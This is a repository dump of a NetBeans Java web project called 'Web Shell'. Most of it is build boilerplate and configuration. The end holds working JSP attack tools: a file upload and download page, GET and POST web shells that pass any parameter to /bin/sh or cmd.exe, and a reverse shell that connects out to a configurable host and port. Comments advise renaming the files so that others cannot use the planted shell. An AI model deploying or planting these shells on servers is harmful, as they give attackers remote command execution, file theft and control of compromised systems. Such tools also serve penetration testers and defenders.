525 |
526 |
527 |
528 |
529 |
530 |
531 |
532 |
533 |
534 |
535 |
536 |
537 |
538 |
539 |
540 |
541 |
542 |
543 |
544 |
545 |
546 |
547 |
548 |
549 |
550 |
551 |
552 |
553 |
554 |
555 |
556 |
557 |
558 |
559 |
560 |
561 |
562 |
563 |
564 |
565 |
566 |
567 |
568 |
569 |
570 |
571 |
572 |
573 |
574 |
575 |
576 |
577 |
578 |
579 |
580 |
581 |
582 |
583 |
584 |
585 |
586 |
587 |
588 |
589 |
590 |
591 |
592 |
593 |
594 |
595 |
596 |
597 |
598 |
599 |
600 |
601 |
602 |
603 |
604 |
605 |
606 |
607 |
608 |
609 |
610 |
611 |
612 |
613 |
614 |
615 |
616 |
617 |
618 |
619 |
620 |
621 |
622 |
623 |
624 |
625 |
626 |
627 |
628 |
629 |
630 |
631 |
632 |
633 |
634 |
635 |
636 |
637 |
638 |
639 |
640 |
641 |
642 |
643 |
644 |
645 |
646 |
647 |
648 |
649 |
650 |
651 |
652 |
653 |
654 |
655 |
656 |
657 |
658 |
659 |
660 |
661 |
662 |
663 |
664 |
665 |
666 |
667 |
668 |
669 |
670 |
671 |
672 |
673 |
674 |
675 |
676 |
677 |
678 |
679 |
680 |
681 |
682 |
683 |
684 |
685 |
686 |
687 |
688 |
689 |
690 |
691 |
692 |
693 |
694 |
695 |
696 |
697 |
698 |
699 |
700 |
701 |
702 |
703 |
704 |
705 |
706 |
707 |
708 |
709 |
710 |
711 |
712 |
713 |
714 |
715 |
716 |
717 |
718 |
719 |
720 |
721 |
722 |
723 |
724 |
725 |
726 |
727 |
728 |
729 |
730 |
731 |
732 |
733 |
734 |
735 |
736 |
737 |
738 |
739 |
740 |
741 |
742 |
743 |
744 |
745 |
746 |
747 |
748 |
749 |
750 |
751 |
752 |
753 |
754 |
755 |
756 |
757 |
758 |
759 |
760 |
761 |
762 |
763 |
764 |
765 |
766 |
767 |
768 |
769 |
770 |
771 |
772 |
773 |
774 |
775 |
776 |
777 |
778 |
779 |
780 |
781 |
782 |
783 | The libs.CopyLibs.classpath property is not set up.
784 | This property must point to
785 | org-netbeans-modules-java-j2seproject-copylibstask.jar file which is part
786 | of NetBeans IDE installation and is usually located at
787 | <netbeans_installation>/java<version>/ant/extra folder.
788 | Either open the project in the IDE and make sure CopyLibs library
789 | exists or setup the property manually. For example like this:
790 | ant -Dlibs.CopyLibs.classpath=a/path/to/org-netbeans-modules-java-j2seproject-copylibstask.jar
791 |
792 |
793 |
794 |
795 |
796 |
797 |
798 |
799 |
800 |
801 |
802 |
803 |
804 |
805 |
806 |
807 |
808 |
809 |
810 |
811 |
812 |
813 |
814 |
815 |
816 |
817 |
820 |
821 |
822 |
823 |
824 |
825 |
826 |
827 |
828 |
829 |
830 | Must set JVM to use for profiling in profiler.info.jvm
831 | Must set profiler agent JVM arguments in profiler.info.jvmargs.agent
832 |
833 |
836 |
837 |
840 |
841 |
842 |
843 |
844 |
845 |
846 |
847 |
848 |
849 |
850 |
851 |
852 |
853 |
854 |
855 |
856 |
857 |
858 |
859 |
860 |
861 |
862 |
863 |
864 |
865 |
866 |
867 |
868 |
869 |
870 |
871 |
872 |
873 |
874 |
875 |
876 |
877 |
878 |
879 |
880 |
881 |
882 |
883 |
884 |
885 |
886 | Must select some files in the IDE or set javac.includes
887 |
888 |
889 |
890 |
891 |
892 |
893 |
894 |
895 |
896 |
897 |
898 |
899 |
900 |
901 |
902 |
903 |
904 |
905 |
906 |
907 |
908 |
909 |
910 |
911 |
912 |
913 |
914 |
915 |
916 |
917 |
918 |
919 | Must select some files in the IDE or set javac.jsp.includes
920 |
921 |
922 |
923 |
924 |
925 |
926 |
927 |
928 |
929 |
930 |
931 |
932 |
933 |
934 |
935 |
936 |
937 |
938 |
939 |
940 |
941 |
942 |
943 |
944 |
945 | Must select a file in the IDE or set jsp.includes
946 |
947 |
948 |
951 |
952 |
953 |
954 |
955 |
956 |
957 |
958 |
959 |
960 |
961 |
962 |
963 |
964 |
965 |
966 |
967 |
968 |
969 |
970 |
971 |
972 |
973 |
974 |
975 |
976 |
977 |
978 |
979 |
980 |
981 |
982 |
983 |
984 |
985 |
986 |
987 |
988 |
989 |
990 |
991 |
992 |
993 |
994 |
995 |
996 |
997 |
998 |
999 |
1000 |
1001 |
1002 |
1003 |
1004 |
1005 |
1008 |
1009 |
1010 |
1011 |
1012 |
1013 |
1014 |
1015 |
1016 |
1017 |
1018 |
1019 |
1020 |
1021 |
1022 |
1023 |
1024 |
1025 |
1026 |
1027 |
1028 |
1029 |
1030 |
1031 |
1032 |
1033 |
1034 |
1035 |
1036 |
1037 |
1038 |
1039 |
1040 |
1041 |
1042 |
1043 |
1044 |
1045 |
1046 |
1047 |
1048 |
1049 |
1050 |
1051 |
1052 |
1053 |
1054 |
1055 |
1056 |
1057 |
1058 |
1059 |
1060 |
1061 |
1062 |
1063 |
1064 |
1065 |
1066 |
1067 |
1068 |
1069 |
1070 |
1071 |
1072 |
1073 |
1074 |
1075 |
1076 |
1077 |
1078 |
1079 |
1080 |
1081 |
1082 |
1083 |
1084 |
1085 |
1086 |
1087 |
1088 |
1089 |
1090 |
1091 |
1092 |
1093 |
1094 |
1095 |
1096 |
1097 |
1098 |
1099 |
1100 |
1101 |
1102 |
1103 |
1104 |
1105 |
1106 |
1107 |
1108 |
1109 |
1110 |
1111 |
1112 | Browser not found, cannot launch the deployed application. Try to set the BROWSER environment variable.
1113 |
1114 |
1115 | Launching ${browse.url}
1116 |
1117 |
1118 |
1119 |
1120 |
1121 | Must select one file in the IDE or set run.class
1122 |
1123 |
1124 |
1125 | Must select one file in the IDE or set run.class
1126 |
1127 |
1128 |
1129 |
1130 |
1131 |
1134 |
1135 |
1136 |
1137 |
1138 |
1139 |
1140 |
1141 |
1142 |
1143 |
1144 |
1145 |
1146 |
1147 |
1148 |
1149 |
1150 |
1151 |
1152 |
1153 |
1154 |
1155 |
1156 |
1157 |
1158 |
1159 |
1160 |
1161 |
1162 |
1163 |
1164 |
1165 | Must select one file in the IDE or set debug.class
1166 |
1167 |
1168 |
1169 |
1170 |
1171 |
1172 |
1173 |
1174 |
1175 |
1176 |
1177 | Must select one file in the IDE or set debug.class
1178 |
1179 |
1180 |
1181 |
1182 | Must set fix.includes
1183 |
1184 |
1185 |
1186 |
1187 |
1188 |
1189 |
1194 |
1197 |
1198 |
1199 |
1200 |
1201 |
1202 |
1203 |
1204 |
1205 |
1206 |
1207 |
1208 |
1209 |
1210 |
1211 |
1212 |
1213 |
1214 |
1215 |
1216 |
1217 |
1218 |
1219 | This target only works when run from inside the NetBeans IDE.
1220 |
1221 |
1222 |
1223 |
1224 |
1225 |
1226 |
1227 |
1228 |
1229 |
1230 |
1231 |
1232 |
1233 |
1234 |
1235 |
1236 |
1237 |
1238 |
1239 |
1240 |
1241 |
1242 |
1243 |
1244 |
1245 |
1246 |
1247 |
1248 |
1249 |
1250 |
1251 |
1252 |
1253 |
1254 |
1255 |
1256 |
1257 |
1258 |
1259 |
1260 |
1261 |
1262 |
1263 |
1264 |
1265 |
1266 |
1267 |
1268 |
1269 |
1270 |
1273 |
1274 |
1275 |
1276 |
1277 |
1278 |
1279 |
1280 |
1281 |
1282 |
1283 |
1284 |
1285 |
1286 |
1287 |
1288 |
1289 |
1290 |
1291 |
1292 |
1293 |
1294 |
1295 |
1296 |
1297 |
1298 |
1299 |
1303 |
1304 |
1305 |
1306 |
1307 |
1308 |
1309 |
1310 |
1311 |
1312 |
1313 |
1314 |
1315 |
1316 |
1317 |
1318 |
1319 |
1320 |
1321 |
1322 |
1323 |
1324 |
1325 |
1326 |
1327 | Must select some files in the IDE or set javac.includes
1328 |
1329 |
1330 |
1331 |
1332 |
1333 |
1334 |
1335 |
1336 |
1337 |
1338 |
1342 |
1343 |
1344 |
1345 |
1346 |
1347 |
1348 |
1349 | Some tests failed; see details above.
1350 |
1351 |
1352 |
1353 |
1354 |
1355 |
1356 |
1357 |
1358 | Must select some files in the IDE or set test.includes
1359 |
1360 |
1361 |
1362 | Some tests failed; see details above.
1363 |
1364 |
1365 |
1366 | Must select some files in the IDE or set test.class
1367 | Must select some method in the IDE or set test.method
1368 |
1369 |
1370 |
1371 | Some tests failed; see details above.
1372 |
1373 |
1374 |
1378 |
1379 | Must select one file in the IDE or set test.class
1380 |
1381 |
1382 |
1383 | Must select one file in the IDE or set test.class
1384 | Must select some method in the IDE or set test.method
1385 |
1386 |
1387 |
1388 |
1389 |
1390 |
1391 |
1392 |
1393 |
1394 |
1395 |
1396 |
1397 |
1401 |
1402 |
1403 |
1404 |
1405 |
1406 |
1407 |
1408 |
1409 |
1410 |
1411 |
1412 |
1413 |
1414 |
1415 |
1416 |
1417 |
1418 |
1419 |
1420 |
1421 |
1422 |
1423 |
1424 |
1425 |
1426 |
1427 |
1428 |
--------------------------------------------------------------------------------
/src/Web Shell/nbproject/genfiles.properties:
--------------------------------------------------------------------------------
1 | build.xml.data.CRC32=26c2afd3
2 | build.xml.script.CRC32=81e3cf17
3 | build.xml.stylesheet.CRC32=1707db4f@1.84.0.1
4 | # This file is used by a NetBeans-based IDE to track changes in generated files such as build-impl.xml.
5 | # Do not edit this file. You may delete it but then the IDE will never regenerate such files for you.
6 | nbproject/build-impl.xml.data.CRC32=26c2afd3
7 | nbproject/build-impl.xml.script.CRC32=5ee030bd
8 | nbproject/build-impl.xml.stylesheet.CRC32=334708a0@1.84.0.1
9 |
--------------------------------------------------------------------------------
/src/Web Shell/nbproject/project.properties:
--------------------------------------------------------------------------------
1 | annotation.processing.enabled=true
2 | annotation.processing.enabled.in.editor=true
3 | annotation.processing.processors.list=
4 | annotation.processing.run.all.processors=true
5 | annotation.processing.source.output=${build.generated.sources.dir}/ap-source-output
6 | build.classes.dir=${build.web.dir}/WEB-INF/classes
7 | build.classes.excludes=**/*.java,**/*.form
8 | build.dir=build
9 | build.generated.dir=${build.dir}/generated
10 | build.generated.sources.dir=${build.dir}/generated-sources
11 | build.test.classes.dir=${build.dir}/test/classes
12 | build.test.results.dir=${build.dir}/test/results
13 | build.web.dir=${build.dir}/web
14 | build.web.excludes=${build.classes.excludes}
15 | client.urlPart=
16 | compile.jsps=false
17 | conf.dir=${source.root}/conf
18 | debug.classpath=${build.classes.dir}:${javac.classpath}
19 | debug.test.classpath=\
20 | ${run.test.classpath}
21 | display.browser=true
22 | # Files to be excluded from distribution war
23 | dist.archive.excludes=
24 | dist.dir=dist
25 | dist.ear.war=${dist.dir}/${war.ear.name}
26 | dist.javadoc.dir=${dist.dir}/javadoc
27 | dist.war=${dist.dir}/${war.name}
28 | excludes=
29 | includes=**
30 | j2ee.compile.on.save=true
31 | j2ee.copy.static.files.on.save=true
32 | j2ee.deploy.on.save=true
33 | j2ee.platform=1.5
34 | j2ee.platform.classpath=${j2ee.server.domain}/bin/tomcat-juli.jar:${j2ee.server.domain}/lib/annotations-api.jar:${j2ee.server.domain}/lib/catalina-ant.jar:${j2ee.server.domain}/lib/catalina-ha.jar:${j2ee.server.domain}/lib/catalina-tribes.jar:${j2ee.server.domain}/lib/catalina.jar:${j2ee.server.domain}/lib/ecj-4.4.2.jar:${j2ee.server.domain}/lib/el-api.jar:${j2ee.server.domain}/lib/jasper-el.jar:${j2ee.server.domain}/lib/jasper.jar:${j2ee.server.domain}/lib/jsp-api.jar:${j2ee.server.domain}/lib/servlet-api.jar:${j2ee.server.domain}/lib/tomcat-api.jar:${j2ee.server.domain}/lib/tomcat-coyote.jar:${j2ee.server.domain}/lib/tomcat-dbcp.jar:${j2ee.server.domain}/lib/tomcat-i18n-de.jar:${j2ee.server.domain}/lib/tomcat-i18n-es.jar:${j2ee.server.domain}/lib/tomcat-i18n-fr.jar:${j2ee.server.domain}/lib/tomcat-i18n-ja.jar:${j2ee.server.domain}/lib/tomcat-i18n-ko.jar:${j2ee.server.domain}/lib/tomcat-i18n-ru.jar:${j2ee.server.domain}/lib/tomcat-i18n-zh-CN.jar:${j2ee.server.domain}/lib/tomcat-jdbc.jar:${j2ee.server.domain}/lib/tomcat-util.jar:${j2ee.server.domain}/lib/tomcat7-websocket.jar:${j2ee.server.domain}/lib/websocket-api.jar
35 | j2ee.server.type=Tomcat
36 | jar.compress=false
37 | javac.classpath=
38 | # Space-separated list of extra javac options
39 | javac.compilerargs=
40 | javac.debug=true
41 | javac.deprecation=false
42 | javac.processorpath=\
43 | ${javac.classpath}
44 | javac.source=1.8
45 | javac.target=1.8
46 | javac.test.classpath=\
47 | ${javac.classpath}:\
48 | ${build.classes.dir}
49 | javac.test.processorpath=\
50 | ${javac.test.classpath}
51 | javadoc.additionalparam=
52 | javadoc.author=false
53 | javadoc.encoding=${source.encoding}
54 | javadoc.noindex=false
55 | javadoc.nonavbar=false
56 | javadoc.notree=false
57 | javadoc.preview=true
58 | javadoc.private=false
59 | javadoc.splitindex=true
60 | javadoc.use=true
61 | javadoc.version=false
62 | javadoc.windowtitle=
63 | lib.dir=${web.docbase.dir}/WEB-INF/lib
64 | no.dependencies=false
65 | persistence.xml.dir=${conf.dir}
66 | platform.active=default_platform
67 | resource.dir=setup
68 | run.test.classpath=\
69 | ${javac.test.classpath}:\
70 | ${build.test.classes.dir}
71 | # Space-separated list of JVM arguments used when running a class with a main method or a unit test
72 | # (you may also define separate properties like run-sys-prop.name=value instead of -Dname=value):
73 | runmain.jvmargs=
74 | source.encoding=UTF-8
75 | source.root=src
76 | src.dir=${source.root}/java
77 | test.src.dir=test
78 | war.content.additional=
79 | war.ear.name=${war.name}
80 | war.name=Web_Shell.war
81 | web.docbase.dir=web
82 | webinf.dir=web/WEB-INF
83 |
--------------------------------------------------------------------------------
/src/Web Shell/nbproject/project.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | org.netbeans.modules.web.project
4 |
5 |
6 | Web Shell
7 | 1.6.5
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
--------------------------------------------------------------------------------
/src/Web Shell/src/conf/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 |
3 |
--------------------------------------------------------------------------------
/src/Web Shell/web/META-INF/context.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
--------------------------------------------------------------------------------
/src/Web Shell/web/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | 30
6 |
7 |
8 |
9 | index.jsp
10 |
11 |
12 |
--------------------------------------------------------------------------------
/src/Web Shell/web/files.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.nio.file.Files"%>
2 | <%@page import="java.nio.file.Paths"%>
3 | <%@page import="java.io.File"%>
4 | <%@page import="org.apache.tomcat.util.http.fileupload.FileItem"%>
5 | <%@page import="org.apache.tomcat.util.http.fileupload.servlet.ServletRequestContext"%>
6 | <%@page import="org.apache.tomcat.util.http.fileupload.servlet.ServletFileUpload"%>
7 | <%@page import="org.apache.tomcat.util.http.fileupload.disk.DiskFileItemFactory"%>
8 |
9 | <%@page import="java.util.Iterator"%>
10 | <%-- Copyright (c) 2021 Ivan Šincek --%>
11 | <%-- v3.0 --%>
12 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
13 |
14 | <%-- modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell --%>
15 | <%-- don't forget to change the script name in the action attribute --%>
16 | <%-- when downloading a file, you should URL encode the file path --%>
17 |
18 | <%
19 | // your parameter/key here
20 | String parameter = "file";
21 | String output = "";
22 | if (request.getMethod() == "POST" && request.getContentType() != null && request.getContentType().startsWith("multipart/form-data")) {
23 | Iterator files = new ServletFileUpload(new DiskFileItemFactory()).parseRequest(new ServletRequestContext(request)).iterator();
24 | while (files.hasNext()) {
25 | FileItem file = (FileItem)files.next();
26 | if (file.getFieldName().equals(parameter)) {
27 | try {
28 | output = file.getName();
29 | int pos = output.lastIndexOf(File.separator);
30 | if (pos >= 0) {
31 | output = output.substring(pos + 1);
32 | }
33 | output = System.getProperty("user.dir") + File.separator + output;
34 | file.write(new File(output));
35 | output = String.format("SUCCESS: File was uploaded to '%s'\n", output);
36 | } catch (Exception ex) {
37 | output = String.format("ERROR: %s\n", ex.getMessage());
38 | }
39 | }
40 | file = null;
41 | }
42 | files = null;
43 | }
44 | if (request.getMethod() == "GET" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
45 | try {
46 | output = request.getParameter(parameter).trim();
47 | response.setHeader("Content-Type", "application/octet-stream");
48 | response.setHeader("Content-Disposition", String.format("attachment; filename=\"%s\"", Paths.get(output).getFileName()));
49 | response.getOutputStream().write(Files.readAllBytes(Paths.get(output)));
50 | response.getOutputStream().flush();
51 | response.getOutputStream().close();
52 | } catch (Exception ex) {
53 | output = String.format("ERROR: %s\n", ex.getMessage());
54 | }
55 | }
56 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
57 | // out.print("" + output + "
"); output = null; System.gc();
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | JSP File Upload/Download
66 |
67 |
68 |
69 |
70 |
74 | <% out.print(output); output = null; System.gc(); %>
75 |
76 |
77 |
--------------------------------------------------------------------------------
/src/Web Shell/web/index.jsp:
--------------------------------------------------------------------------------
1 | <%-- Copyright (c) 2021 Ivan Šincek --%>
2 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
3 | <%-- Works on Linux OS, macOS and Windows OS. --%>
4 |
5 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
6 |
7 |
8 |
9 |
10 | Simple Java Web Shells
11 |
12 |
13 |
54 |
55 |
56 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/src/Web Shell/web/jsp_reverse_shell.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.net.SocketTimeoutException"%>
2 | <%@page import="java.util.Arrays"%>
3 | <%@page import="java.net.Socket"%>
4 | <%@page import="java.io.IOException"%>
5 | <%@page import="java.io.OutputStream"%>
6 | <%@page import="java.io.InputStream"%>
7 | <%@page import="java.net.InetSocketAddress"%>
8 |
9 | <%-- Copyright (c) 2021 Ivan Šincek --%>
10 | <%-- v3.0 --%>
11 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
12 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
13 |
14 | <%!
15 | public class ReverseShell {
16 |
17 | private InetSocketAddress addr = null;
18 | private String os = null;
19 | private String shell = null;
20 | private byte[] buffer = null;
21 | private int clen = 0;
22 | private boolean error = false;
23 | private String message = null;
24 |
25 | public ReverseShell(String addr, int port) {
26 | this.addr = new InetSocketAddress(addr, port);
27 | }
28 |
29 | private boolean detect() {
30 | boolean detected = true;
31 | this.os = System.getProperty("os.name").toUpperCase();
32 | if (this.os.contains("LINUX") || this.os.contains("MAC")) {
33 | this.os = "LINUX";
34 | this.shell = "/bin/sh";
35 | } else if (this.os.contains("WIN")) {
36 | this.os = "WINDOWS";
37 | this.shell = "cmd.exe";
38 | } else {
39 | detected = false;
40 | this.message = "SYS_ERROR: Underlying operating system is not supported, program will now exit...\n";
41 | }
42 | return detected;
43 | }
44 |
45 | private String getMessage() {
46 | return this.message;
47 | }
48 |
49 | // strings in Java are immutable, so we need to avoid using them to minimize the data in memory
50 | private void brw(InputStream input, OutputStream output, String iname, String oname) {
51 | int bytes = 0;
52 | try {
53 | do {
54 | if (this.os.equals("WINDOWS") && iname.equals("STDOUT") && this.clen > 0) {
55 | // for some reason Windows OS pipes STDIN into STDOUT
56 | // we do not like that
57 | // we need to discard the data from the stream
58 | do {
59 | bytes = input.read(this.buffer, 0, this.clen >= this.buffer.length ? this.buffer.length : this.clen);
60 | this.clen -= this.clen >= this.buffer.length ? this.buffer.length : this.clen;
61 | } while (bytes > 0 && this.clen > 0);
62 | } else {
63 | bytes = input.read(this.buffer, 0, this.buffer.length);
64 | if (bytes > 0) {
65 | output.write(this.buffer, 0, bytes);
66 | output.flush();
67 | if (this.os.equals("WINDOWS") && oname.equals("STDIN")) {
68 | this.clen += bytes;
69 | }
70 | } else if (iname.equals("SOCKET")) {
71 | this.error = true;
72 | this.message = "SOC_ERROR: Shell connection has been terminated\n";
73 | }
74 | }
75 | } while (input.available() > 0);
76 | } catch (SocketTimeoutException ex) {} catch (IOException ex) {
77 | this.error = true;
78 | this.message = String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n", iname, oname);
79 | }
80 | }
81 |
82 | public void run() {
83 | if (this.detect()) {
84 | Socket client = null;
85 | OutputStream socin = null;
86 | InputStream socout = null;
87 |
88 | Process process = null;
89 | OutputStream stdin = null;
90 | InputStream stdout = null;
91 | InputStream stderr = null;
92 |
93 | try {
94 | client = new Socket();
95 | client.setSoTimeout(100);
96 | client.connect(this.addr);
97 | socin = client.getOutputStream();
98 | socout = client.getInputStream();
99 |
100 | this.buffer = new byte[1024];
101 |
102 | process = new ProcessBuilder(this.shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
103 | stdin = process.getOutputStream();
104 | stdout = process.getInputStream();
105 | stderr = process.getErrorStream();
106 |
107 | do {
108 | if (!process.isAlive()) {
109 | this.message = "PROC_ERROR: Shell process has been terminated\n"; break;
110 | }
111 | this.brw(socout, stdin, "SOCKET", "STDIN");
112 | if (stderr.available() > 0) { this.brw(stderr, socin, "STDERR", "SOCKET"); }
113 | if (stdout.available() > 0) { this.brw(stdout, socin, "STDOUT", "SOCKET"); }
114 | } while (!this.error);
115 | } catch (IOException ex) {
116 | this.message = String.format("ERROR: %s\n", ex.getMessage());
117 | } finally {
118 | if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
119 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
120 | if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
121 | if (process != null) { process.destroy(); }
122 |
123 | if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
124 | if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
125 | if (client != null) { try { client.close(); } catch (IOException ex) {} }
126 |
127 | if (this.buffer != null) { Arrays.fill(this.buffer, (byte)0); }
128 | }
129 | }
130 | }
131 | }
132 | %>
133 |
134 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
135 |
136 | <%
137 | out.print("");
138 | // change the host address and/or port number as necessary
139 | ReverseShell sh = new ReverseShell("127.0.0.1", 9000);
140 | sh.run();
141 | if (sh.getMessage() != null) { out.print(sh.getMessage()); }
142 | sh = null;
143 | System.gc();
144 | out.print("");
145 | %>
146 |
--------------------------------------------------------------------------------
/src/Web Shell/web/simple_jsp_web_shell_get.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.util.Arrays"%>
2 | <%@page import="java.io.IOException"%>
3 | <%@page import="java.nio.charset.StandardCharsets"%>
4 | <%@page import="java.io.InputStream"%>
5 |
6 | <%-- Copyright (c) 2021 Ivan Šincek --%>
7 | <%-- v3.0 --%>
8 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
9 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
10 |
11 | <%-- modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell --%>
12 | <%-- you must URL encode your commands --%>
13 |
14 | <%
15 | // your parameter/key here
16 | String parameter = "command";
17 | String output = "";
18 | if (request.getMethod() == "GET" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
19 | String os = System.getProperty("os.name").toUpperCase();
20 | String shell = null;
21 | if (os.contains("LINUX") || os.contains("MAC")) {
22 | shell = "/bin/sh -c";
23 | } else if (os.contains("WIN")) {
24 | shell = "cmd.exe /c";
25 | } else {
26 | output = "SYS_ERROR: Underlying operating system is not supported\n";
27 | }
28 | if (shell != null) {
29 | Process process = null;
30 | InputStream stdout = null;
31 | byte[] buffer = null;
32 |
33 | try {
34 | process = Runtime.getRuntime().exec(String.format("%s \"(%s) 2>&1\"", shell, request.getParameter(parameter).trim()));
35 | stdout = process.getInputStream();
36 | buffer = new byte[1024];
37 |
38 | int bytes = 0;
39 | do {
40 | bytes = stdout.read(buffer, 0, buffer.length);
41 | if (bytes > 0) {
42 | output += new String(buffer, 0, bytes, StandardCharsets.UTF_8);
43 | }
44 | } while (bytes > 0);
45 | output = output.replace("<", "<");
46 | output = output.replace(">", ">");
47 | } catch (IOException ex) {
48 | output = String.format("ERROR: %s\n", ex);
49 | } finally {
50 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} stdout = null; }
51 | if (process != null) { process.destroy(); process = null; }
52 | if (buffer != null) { Arrays.fill(buffer, (byte)0); buffer = null; }
53 | }
54 | }
55 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
56 | // out.print("" + output + "
"); output = null; System.gc();
57 | }
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | Simple JSP Web Shell
66 |
67 |
68 |
69 |
70 | <% out.print(output); output = null; System.gc(); %>
71 |
72 |
73 |
--------------------------------------------------------------------------------
/src/Web Shell/web/simple_jsp_web_shell_post.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.util.Arrays"%>
2 | <%@page import="java.io.IOException"%>
3 | <%@page import="java.nio.charset.StandardCharsets"%>
4 | <%@page import="java.io.InputStream"%>
5 |
6 | <%-- Copyright (c) 2021 Ivan Šincek --%>
7 | <%-- v3.0 --%>
8 | <%-- Requires Java SE v8 or greater, JDK v8 or greater, and Java EE v5 or greater. --%>
9 | <%-- Works on Linux OS, macOS, and Windows OS. --%>
10 |
11 | <%-- modify the script name and request parameter name to random ones to prevent others form accessing and using your web shell --%>
12 | <%-- don't forget to change the script name in the action attribute --%>
13 |
14 | <%
15 | // your parameter/key here
16 | String parameter = "command";
17 | String output = "";
18 | if (request.getMethod() == "POST" && request.getParameter(parameter) != null && request.getParameter(parameter).trim().length() > 0) {
19 | String os = System.getProperty("os.name").toUpperCase();
20 | String shell = null;
21 | if (os.contains("LINUX") || os.contains("MAC")) {
22 | shell = "/bin/sh -c";
23 | } else if (os.contains("WIN")) {
24 | shell = "cmd.exe /c";
25 | } else {
26 | output = "SYS_ERROR: Underlying operating system is not supported\n";
27 | }
28 | if (shell != null) {
29 | Process process = null;
30 | InputStream stdout = null;
31 | byte[] buffer = null;
32 |
33 | try {
34 | process = Runtime.getRuntime().exec(String.format("%s \"(%s) 2>&1\"", shell, request.getParameter(parameter).trim()));
35 | stdout = process.getInputStream();
36 | buffer = new byte[1024];
37 |
38 | int bytes = 0;
39 | do {
40 | bytes = stdout.read(buffer, 0, buffer.length);
41 | if (bytes > 0) {
42 | output += new String(buffer, 0, bytes, StandardCharsets.UTF_8);
43 | }
44 | } while (bytes > 0);
45 | output = output.replace("<", "<");
46 | output = output.replace(">", ">");
47 | } catch (IOException ex) {
48 | output = String.format("ERROR: %s\n", ex);
49 | } finally {
50 | if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} stdout = null; }
51 | if (process != null) { process.destroy(); process = null; }
52 | if (buffer != null) { Arrays.fill(buffer, (byte)0); buffer = null; }
53 | }
54 | }
55 | // if you do not want to use the whole HTML as below, uncomment this line and delete the whole HTML
56 | // out.print("" + output + "
"); output = null; System.gc();
57 | }
58 | %>
59 |
60 | <%@page contentType="text/html" pageEncoding="UTF-8"%>
61 |
62 |
63 |
64 |
65 | Simple JSP Web Shell
66 |
67 |
68 |
69 |
70 |
73 | <% out.print(output); output = null; System.gc(); %>
74 |
75 |
76 |
--------------------------------------------------------------------------------